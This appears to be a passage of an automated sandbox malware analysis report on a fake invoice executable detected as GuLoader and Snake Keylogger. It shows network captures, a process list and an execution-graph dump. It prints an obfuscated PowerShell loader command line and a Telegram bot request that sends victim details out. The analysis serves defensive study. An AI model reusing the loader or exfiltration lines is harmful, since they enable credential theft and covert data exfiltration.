                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1499&sent=6&recv=7&lost=0&retrans=1&sent_bytes=4240&recv_bytes=698&delivery_rate=202608&cwnd=207&unsent_bytes=0&cid=80a75bc321c533a4&ts=501&x=0"
                                                                                                                                                              2024-11-25 17:44:13 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                                              Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              9192.168.2.549853172.67.177.1344433652C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-11-25 17:44:16 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                                              Host: reallyfreegeoip.org
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              2024-11-25 17:44:16 UTC849INHTTP/1.1 200 OK
                                                                                                                                                              Date: Mon, 25 Nov 2024 17:44:16 GMT
                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                              Content-Length: 361
                                                                                                                                                              Connection: close
                                                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                              Age: 520565
                                                                                                                                                              Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y8DwpzCytlF9tg84f57CpUNY759wcJQ6LDqiO1mIku18BDObsH%2BWsPQ3P4B7nuSoxAXULFf8mehr97arTJ2qTEb103DO4UYGwRVg8%2BRc38xNFvqLk55Lwq24Nvm6vPK0LRU0Lh1M"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 8e83721f4ebd4364-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1618&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=698&delivery_rate=1773997&cwnd=206&unsent_bytes=0&cid=5afed1da00585f9e&ts=499&x=0"
                                                                                                                                                              2024-11-25 17:44:16 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                                              Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              10192.168.2.549865172.67.177.1344433652C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-11-25 17:44:19 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                                              Host: reallyfreegeoip.org
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              2024-11-25 17:44:20 UTC851INHTTP/1.1 200 OK
                                                                                                                                                              Date: Mon, 25 Nov 2024 17:44:19 GMT
                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                              Content-Length: 361
                                                                                                                                                              Connection: close
                                                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                              Age: 520568
                                                                                                                                                              Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NocXw%2F%2FEXqQsEM6Q%2FwUnUYWuEIdnA4Zje57IAIoPDgUFoim72R2P9kjXnOfzZh6ZJ2kozyJWSBbJZ9lmlA2FRhuHJe50gBKhZZ0vJoZ8ozoWRFk7nGLCqcQxyJ2z0PrpYvsGi08P"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 8e837234cc0bc43b-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1495&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1862244&cwnd=187&unsent_bytes=0&cid=e77ba6d22d30cb55&ts=492&x=0"
                                                                                                                                                              2024-11-25 17:44:20 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                                              Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              11192.168.2.549870149.154.167.2204433652C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-11-25 17:44:21 UTC345OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:238576%0D%0ADate%20and%20Time:%2026/11/2024%20/%2020:06:18%0D%0ACountry%20Name:%20United%20States%0D%0A[%20238576%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] HTTP/1.1
                                                                                                                                                              Host: api.telegram.org
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              2024-11-25 17:44:22 UTC344INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.18.0
                                                                                                                                                              Date: Mon, 25 Nov 2024 17:44:22 GMT
                                                                                                                                                              Content-Type: application/json
                                                                                                                                                              Content-Length: 55
                                                                                                                                                              Connection: close
                                                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                              2024-11-25 17:44:22 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                                                              Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                                                              Click to jump to process

                                                                                                                                                              Click to jump to process

                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                              Click to jump to process

                                                                                                                                                              Target ID:0
                                                                                                                                                              Start time:12:42:54
                                                                                                                                                              Start date:25/11/2024
                                                                                                                                                              Path:C:\Users\user\Desktop\INV-0542.pdf.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:"C:\Users\user\Desktop\INV-0542.pdf.exe"
                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                              File size:923'768 bytes
                                                                                                                                                              MD5 hash:FA02056B1A21F75EFABDDA81219FB7DB
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:low
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:2
                                                                                                                                                              Start time:12:42:57
                                                                                                                                                              Start date:25/11/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:"powershell.exe" -windowstyle minimized "$Bnkerkken=Get-Content -Raw 'C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Suborbiculated.Amb';$Burhne=$Bnkerkken.SubString(72926,3);.$Burhne($Bnkerkken)"
                                                                                                                                                              Imagebase:0x3b0000
                                                                                                                                                              File size:433'152 bytes
                                                                                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Yara matches:
                                                                                                                                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.2422857141.0000000009AD2000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              Reputation:high
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:3
                                                                                                                                                              Start time:12:42:57
                                                                                                                                                              Start date:25/11/2024
                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:5
                                                                                                                                                              Start time:12:43:31
                                                                                                                                                              Start date:25/11/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                                                                                                              Imagebase:0x8c0000
                                                                                                                                                              File size:59'904 bytes
                                                                                                                                                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Yara matches:
                                                                                                                                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.3302092440.0000000021891000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              Reputation:high
                                                                                                                                                              Has exited:false

                                                                                                                                                              Reset < >

                                                                                                                                                                Execution Graph

                                                                                                                                                                Execution Coverage:22.2%
                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                Signature Coverage:16.9%
                                                                                                                                                                Total number of Nodes:1376
                                                                                                                                                                Total number of Limit Nodes:37
                                                                                                                                                                execution_graph 4096 401bc0 4097 401c11 4096->4097 4098 401bcd 4096->4098 4100 401c16 4097->4100 4101 401c3b GlobalAlloc 4097->4101 4099 4023af 4098->4099 4104 401be4 4098->4104 4102 40657e 21 API calls 4099->4102 4108 401c56 4100->4108 4117 406541 lstrcpynW 4100->4117 4103 40657e 21 API calls 4101->4103 4106 4023bc 4102->4106 4103->4108 4115 406541 lstrcpynW 4104->4115 4110 405ba1 MessageBoxIndirectW 4106->4110 4109 401c28 GlobalFree 4109->4108 4110->4108 4111 401bf3 4116 406541 lstrcpynW 4111->4116 4113 401c02 4118 406541 lstrcpynW 4113->4118 4115->4111 4116->4113 4117->4109 4118->4108 3225 403fc1 3226 403fd9 3225->3226 3227 40413a 3225->3227 3226->3227 3228 403fe5 3226->3228 3229 40418b 3227->3229 3230 40414b GetDlgItem GetDlgItem 3227->3230 3232 403ff0 SetWindowPos 3228->3232 3233 404003 3228->3233 3231 4041e5 3229->3231 3239 401389 2 API calls 3229->3239 3234 4044c0 22 API calls 3230->3234 3240 404135 3231->3240 3298 40450c 3231->3298 3232->3233 3236 40400c ShowWindow 3233->3236 3237 40404e 3233->3237 3238 404175 SetClassLongW 3234->3238 3241 404127 3236->3241 3242 40402c GetWindowLongW 3236->3242 3243 404056 DestroyWindow 3237->3243 3244 40406d 3237->3244 3245 40140b 2 API calls 3238->3245 3249 4041bd 3239->3249 3337 404527 3241->3337 3242->3241 3251 404045 ShowWindow 3242->3251 3246 404449 3243->3246 3247 404072 SetWindowLongW 3244->3247 3248 404083 3244->3248 3245->3229 3246->3240 3258 40447a ShowWindow 3246->3258 3247->3240 3248->3241 3252 40408f GetDlgItem 3248->3252 3249->3231 3253 4041c1 SendMessageW 3249->3253 3251->3237 3256 4040a0 SendMessageW IsWindowEnabled 3252->3256 3257 4040bd 3252->3257 3253->3240 3254 40140b 2 API calls 3266 4041f7 3254->3266 3255 40444b DestroyWindow EndDialog 3255->3246 3256->3240 3256->3257 3260 4040ca 3257->3260 3263 404111 SendMessageW 3257->3263 3264 4040dd 3257->3264 3272 4040c2 3257->3272 3258->3240 3260->3263 3260->3272 3262 4044c0 22 API calls 3262->3266 3263->3241 3267 4040e5 3264->3267 3268 4040fa 3264->3268 3265 4040f8 3265->3241 3266->3240 3266->3254 3266->3255 3266->3262 3289 40438b DestroyWindow 3266->3289 3301 40657e 3266->3301 3318 4044c0 3266->3318 3331 40140b 3267->3331 3269 40140b 2 API calls 3268->3269 3271 404101 3269->3271 3271->3241 3271->3272 3334 404499 3272->3334 3274 404272 GetDlgItem 3275 404287 3274->3275 3276 40428f ShowWindow KiUserCallbackDispatcher 3274->3276 3275->3276 3321 4044e2 KiUserCallbackDispatcher 3276->3321 3278 4042b9 EnableWindow 3283 4042cd 3278->3283 3279 4042d2 GetSystemMenu EnableMenuItem SendMessageW 3280 404302 SendMessageW 3279->3280 3279->3283 3280->3283 3283->3279 3322 4044f5 SendMessageW 3283->3322 3323 403fa2 3283->3323 3326 406541 lstrcpynW 3283->3326 3285 404331 lstrlenW 3286 40657e 21 API calls 3285->3286 3287 404347 SetWindowTextW 3286->3287 3327 401389 3287->3327 3289->3246 3290 4043a5 CreateDialogParamW 3289->3290 3290->3246 3291 4043d8 3290->3291 3292 4044c0 22 API calls 3291->3292 3293 4043e3 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3292->3293 3294 401389 2 API calls 3293->3294 3295 404429 3294->3295 3295->3240 3296 404431 ShowWindow 3295->3296 3297 40450c SendMessageW 3296->3297 3297->3246 3299 404524 3298->3299 3300 404515 SendMessageW 3298->3300 3299->3266 3300->3299 3302 406589 3301->3302 3303 4067d0 3302->3303 3306 4067a1 lstrlenW 3302->3306 3310 40669a GetSystemDirectoryW 3302->3310 3311 40657e 15 API calls 3302->3311 3312 4066b0 GetWindowsDirectoryW 3302->3312 3314 40657e 15 API calls 3302->3314 3315 406742 lstrcatW 3302->3315 3317 406712 SHGetPathFromIDListW CoTaskMemFree 3302->3317 3351 40640f 3302->3351 3356 406935 GetModuleHandleA 3302->3356 3362 4067ef 3302->3362 3371 406488 wsprintfW 3302->3371 3372 406541 lstrcpynW 3302->3372 3304 4067e9 3303->3304 3373 406541 lstrcpynW 3303->3373 3304->3266 3306->3302 3310->3302 3311->3306 3312->3302 3314->3302 3315->3302 3317->3302 3319 40657e 21 API calls 3318->3319 3320 4044cb SetDlgItemTextW 3319->3320 3320->3274 3321->3278 3322->3283 3324 40657e 21 API calls 3323->3324 3325 403fb0 SetWindowTextW 3324->3325 3325->3283 3326->3285 3329 401390 3327->3329 3328 4013fe 3328->3266 3329->3328 3330 4013cb MulDiv SendMessageW 3329->3330 3330->3329 3332 401389 2 API calls 3331->3332 3333 401420 3332->3333 3333->3272 3335 4044a0 3334->3335 3336 4044a6 SendMessageW 3334->3336 3335->3336 3336->3265 3338 4045ea 3337->3338 3339 40453f GetWindowLongW 3337->3339 3338->3240 3339->3338 3340 404554 3339->3340 3340->3338 3341 404581 GetSysColor 3340->3341 3342 404584 3340->3342 3341->3342 3343 404594 SetBkMode 3342->3343 3344 40458a SetTextColor 3342->3344 3345 4045b2 3343->3345 3346 4045ac GetSysColor 3343->3346 3344->3343 3347 4045c3 3345->3347 3348 4045b9 SetBkColor 3345->3348 3346->3345 3347->3338 3349 4045d6 DeleteObject 3347->3349 3350 4045dd CreateBrushIndirect 3347->3350 3348->3347 3349->3350 3350->3338 3374 4063ae 3351->3374 3354 406443 RegQueryValueExW RegCloseKey 3355 406473 3354->3355 3355->3302 3357 406951 3356->3357 3358 40695b GetProcAddress 3356->3358 3378 4068c5 GetSystemDirectoryW 3357->3378 3361 40696a 3358->3361 3360 406957 3360->3358 3360->3361 3361->3302 3369 4067fc 3362->3369 3363 406872 3364 406877 CharPrevW 3363->3364 3367 406898 3363->3367 3364->3363 3365 406865 CharNextW 3365->3363 3365->3369 3367->3302 3368 406851 CharNextW 3368->3369 3369->3363 3369->3365 3369->3368 3370 406860 CharNextW 3369->3370 3381 405e3d 3369->3381 3370->3365 3371->3302 3372->3302 3373->3304 3375 4063bd 3374->3375 3376 4063c1 3375->3376 3377 4063c6 RegOpenKeyExW 3375->3377 3376->3354 3376->3355 3377->3376 3379 4068e7 wsprintfW LoadLibraryExW 3378->3379 3379->3360 3382 405e43 3381->3382 3383 405e59 3382->3383 3384 405e4a CharNextW 3382->3384 3383->3369 3384->3382 4119 402641 4120 402dcb 21 API calls 4119->4120 4121 402648 4120->4121 4124 406031 GetFileAttributesW CreateFileW 4121->4124 4123 402654 4124->4123 3385 4025c3 3396 402e0b 3385->3396 3389 4025d6 3390 4025f2 RegEnumKeyW 3389->3390 3391 4025fe RegEnumValueW 3389->3391 3394 402953 3389->3394 3392 40261a RegCloseKey 3390->3392 3391->3392 3393 402613 3391->3393 3392->3394 3393->3392 3404 402dcb 3396->3404 3398 402e22 3399 4063ae RegOpenKeyExW 3398->3399 3400 4025cd 3399->3400 3401 402da9 3400->3401 3402 40657e 21 API calls 3401->3402 3403 402dbe 3402->3403 3403->3389 3405 402dd7 3404->3405 3406 40657e 21 API calls 3405->3406 3407 402df8 3406->3407 3408 402e04 3407->3408 3409 4067ef 5 API calls 3407->3409 3408->3398 3409->3408 3641 4015c8 3642 402dcb 21 API calls 3641->3642 3643 4015cf SetFileAttributesW 3642->3643 3644 4015e1 3643->3644 3645 401fc9 3646 402dcb 21 API calls 3645->3646 3647 401fcf 3646->3647 3648 4055c6 28 API calls 3647->3648 3649 401fd9 3648->3649 3660 405b24 CreateProcessW 3649->3660 3654 401ff4 3656 402004 3654->3656 3657 401ff9 3654->3657 3655 402953 3659 402002 CloseHandle 3656->3659 3668 406488 wsprintfW 3657->3668 3659->3655 3661 401fdf 3660->3661 3662 405b57 CloseHandle 3660->3662 3661->3655 3661->3659 3663 4069e0 WaitForSingleObject 3661->3663 3662->3661 3664 4069fa 3663->3664 3665 406a0c GetExitCodeProcess 3664->3665 3669 406971 3664->3669 3665->3654 3668->3659 3670 40698e PeekMessageW 3669->3670 3671 406984 DispatchMessageW 3670->3671 3672 40699e WaitForSingleObject 3670->3672 3671->3670 3672->3664 3673 4021cf 3674 402dcb 21 API calls 3673->3674 3675 4021d6 3674->3675 3676 402dcb 21 API calls 3675->3676 3677 4021e0 3676->3677 3678 402dcb 21 API calls 3677->3678 3679 4021ea 3678->3679 3680 402dcb 21 API calls 3679->3680 3681 4021f4 3680->3681 3682 402dcb 21 API calls 3681->3682 3683 4021fe 3682->3683 3684 40223d CoCreateInstance 3683->3684 3685 402dcb 21 API calls 3683->3685 3688 40225c 3684->3688 3685->3684 3686 401423 28 API calls 3687 40231b 3686->3687 3688->3686 3688->3687 3689 40204f 3690 402dcb 21 API calls 3689->3690 3691 402056 3690->3691 3692 406935 5 API calls 3691->3692 3693 402065 GetFileVersionInfoSizeW 3692->3693 3694 402081 GlobalAlloc 3693->3694 3695 402c4f 3693->3695 3694->3695 3696 402095 3694->3696 3697 406935 5 API calls 3696->3697 3698 40209c 3697->3698 3699 406935 5 API calls 3698->3699 3701 4020a6 3699->3701 3700 4020f1 3700->3695 3701->3700 3705 406488 wsprintfW 3701->3705 3703 4020df 3706 406488 wsprintfW 3703->3706 3705->3703 3706->3700 4135 40254f 4136 402e0b 21 API calls 4135->4136 4137 402559 4136->4137 4138 402dcb 21 API calls 4137->4138 4139 402562 4138->4139 4140 40256d RegQueryValueExW 4139->4140 4145 402953 4139->4145 4141 402593 RegCloseKey 4140->4141 4142 40258d 4140->4142 4141->4145 4142->4141 4146 406488 wsprintfW 4142->4146 4146->4141 4147 403bd1 4148 403bdc 4147->4148 4149 403be0 4148->4149 4150 403be3 GlobalAlloc 4148->4150 4150->4149 4158 401a55 4159 402dcb 21 API calls 4158->4159 4160 401a5e ExpandEnvironmentStringsW 4159->4160 4161 401a72 4160->4161 4162 401a85 4160->4162 4161->4162 4163 401a77 lstrcmpW 4161->4163 4163->4162 3819 4023d7 3820 4023e5 3819->3820 3821 4023df 3819->3821 3823 402dcb 21 API calls 3820->3823 3825 4023f3 3820->3825 3822 402dcb 21 API calls 3821->3822 3822->3820 3823->3825 3824 402401 3827 402dcb 21 API calls 3824->3827 3825->3824 3826 402dcb 21 API calls 3825->3826 3826->3824 3828 40240a WritePrivateProfileStringW 3827->3828 4164 4014d7 4165 402da9 21 API calls 4164->4165 4166 4014dd Sleep 4165->4166 4168 402c4f 4166->4168 3829 402459 3830 402461 3829->3830 3831 40248c 3829->3831 3832 402e0b 21 API calls 3830->3832 3833 402dcb 21 API calls 3831->3833 3834 402468 3832->3834 3835 402493 3833->3835 3836 402472 3834->3836 3840 4024a0 3834->3840 3841 402e89 3835->3841 3838 402dcb 21 API calls 3836->3838 3839 402479 RegDeleteValueW RegCloseKey 3838->3839 3839->3840 3842 402e96 3841->3842 3843 402e9d 3841->3843 3842->3840 3843->3842 3845 402ece 3843->3845 3846 4063ae RegOpenKeyExW 3845->3846 3847 402efc 3846->3847 3848 402f0c RegEnumValueW 3847->3848 3849 402f2f 3847->3849 3856 402fa6 3847->3856 3848->3849 3850 402f96 RegCloseKey 3848->3850 3849->3850 3851 402f6b RegEnumKeyW 3849->3851 3852 402f74 RegCloseKey 3849->3852 3855 402ece 6 API calls 3849->3855 3850->3856 3851->3849 3851->3852 3853 406935 5 API calls 3852->3853 3854 402f84 3853->3854 3854->3856 3857 402f88 RegDeleteKeyW 3854->3857 3855->3849 3856->3842 3857->3856 4174 40175a 4175 402dcb 21 API calls 4174->4175 4176 401761 SearchPathW 4175->4176 4177 40177c 4176->4177 4178 401d5d 4179 402da9 21 API calls 4178->4179 4180 401d64 4179->4180 4181 402da9 21 API calls 4180->4181 4182 401d70 GetDlgItem 4181->4182 4183 40265d 4182->4183 4184 406c5f 4190 406ae3 4184->4190 4185 40744e 4186 406b64 GlobalFree 4187 406b6d GlobalAlloc 4186->4187 4187->4185 4187->4190 4188 406be4 GlobalAlloc 4188->4185 4188->4190 4189 406bdb GlobalFree 4189->4188 4190->4185 4190->4186 4190->4187 4190->4188 4190->4189 4191 402663 4192 402692 4191->4192 4193 402677 4191->4193 4195 4026c2 4192->4195 4196 402697 4192->4196 4194 402da9 21 API calls 4193->4194 4205 40267e 4194->4205 4198 402dcb 21 API calls 4195->4198 4197 402dcb 21 API calls 4196->4197 4199 40269e 4197->4199 4200 4026c9 lstrlenW 4198->4200 4208 406563 WideCharToMultiByte 4199->4208 4200->4205 4202 4026b2 lstrlenA 4202->4205 4203 40270c 4204 4026f6 4204->4203 4206 4060e3 WriteFile 4204->4206 4205->4203 4205->4204 4209 406112 SetFilePointer 4205->4209 4206->4203 4208->4202 4210 406146 4209->4210 4211 40612e 4209->4211 4210->4204 4212 4060b4 ReadFile 4211->4212 4213 40613a 4212->4213 4213->4210 4214 406177 SetFilePointer 4213->4214 4215 40614f SetFilePointer 4213->4215 4214->4210 4215->4214 4216 40615a 4215->4216 4217 4060e3 WriteFile 4216->4217 4217->4210 3476 4015e6 3477 402dcb 21 API calls 3476->3477 3478 4015ed 3477->3478 3496 405ebb CharNextW CharNextW 3478->3496 3480 4015f6 3481 401656 3480->3481 3482 405e3d CharNextW 3480->3482 3492 40161f 3480->3492 3493 40163c GetFileAttributesW 3480->3493 3506 405b0c 3480->3506 3512 405aef CreateDirectoryW 3480->3512 3483 401688 3481->3483 3484 40165b 3481->3484 3482->3480 3486 401423 28 API calls 3483->3486 3502 401423 3484->3502 3494 401680 3486->3494 3491 40166f SetCurrentDirectoryW 3491->3494 3492->3480 3509 405a95 CreateDirectoryW 3492->3509 3493->3480 3497 405ed8 3496->3497 3500 405eea 3496->3500 3498 405ee5 CharNextW 3497->3498 3497->3500 3501 405f0e 3498->3501 3499 405e3d CharNextW 3499->3500 3500->3499 3500->3501 3501->3480 3503 4055c6 28 API calls 3502->3503 3504 401431 3503->3504 3505 406541 lstrcpynW 3504->3505 3505->3491 3507 406935 5 API calls 3506->3507 3508 405b13 3507->3508 3508->3480 3510 405ae5 GetLastError 3509->3510 3511 405ae1 3509->3511 3510->3511 3511->3492 3513 405b03 GetLastError 3512->3513 3514 405aff 3512->3514 3513->3514 3514->3480 3515 401966 3516 401968 3515->3516 3517 402dcb 21 API calls 3516->3517 3518 40196d 3517->3518 3521 405c4d 3518->3521 3560 405f18 3521->3560 3524 405c75 DeleteFileW 3526 401976 3524->3526 3525 405c8c 3528 405dac 3525->3528 3574 406541 lstrcpynW 3525->3574 3528->3526 3592 40689e FindFirstFileW 3528->3592 3529 405cb2 3530 405cc5 3529->3530 3531 405cb8 lstrcatW 3529->3531 3575 405e5c lstrlenW 3530->3575 3532 405ccb 3531->3532 3535 405cdb lstrcatW 3532->3535 3537 405ce6 lstrlenW FindFirstFileW 3532->3537 3535->3537 3537->3528 3546 405d08 3537->3546 3538 405dd5 3595 405e10 lstrlenW CharPrevW 3538->3595 3541 405d8f FindNextFileW 3544 405da5 FindClose 3541->3544 3541->3546 3542 405c05 5 API calls 3545 405de7 3542->3545 3544->3528 3547 405e01 3545->3547 3548 405deb 3545->3548 3546->3541 3555 405d50 3546->3555 3579 406541 lstrcpynW 3546->3579 3550 4055c6 28 API calls 3547->3550 3548->3526 3551 4055c6 28 API calls 3548->3551 3550->3526 3553 405df8 3551->3553 3552 405c4d 64 API calls 3552->3555 3554 406301 40 API calls 3553->3554 3557 405dff 3554->3557 3555->3541 3555->3552 3556 4055c6 28 API calls 3555->3556 3558 4055c6 28 API calls 3555->3558 3580 405c05 